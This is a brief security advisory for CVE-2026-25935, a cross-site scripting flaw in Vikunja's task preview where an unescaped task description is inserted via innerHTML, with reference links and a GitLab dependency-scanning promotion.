CVE-2026-25935: Vikunja Vulnerable to XSS Via Task Preview
The task preview component creates a unparented div. The div’s innerHtml is set to the unescaped description of the task
References
- github.com/advisories/GHSA-m4g2-2q66-vc9v
- github.com/go-vikunja/vikunja
- github.com/go-vikunja/vikunja/commit/dd0b82f00a8c9ded1c19a1e643a197c514be6d37
- github.com/go-vikunja/vikunja/releases/tag/v1.1.0
- github.com/go-vikunja/vikunja/security/advisories/GHSA-m4g2-2q66-vc9v
- nvd.nist.gov/vuln/detail/CVE-2026-25935
Code Behaviors & Features
Detect and mitigate CVE-2026-25935 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →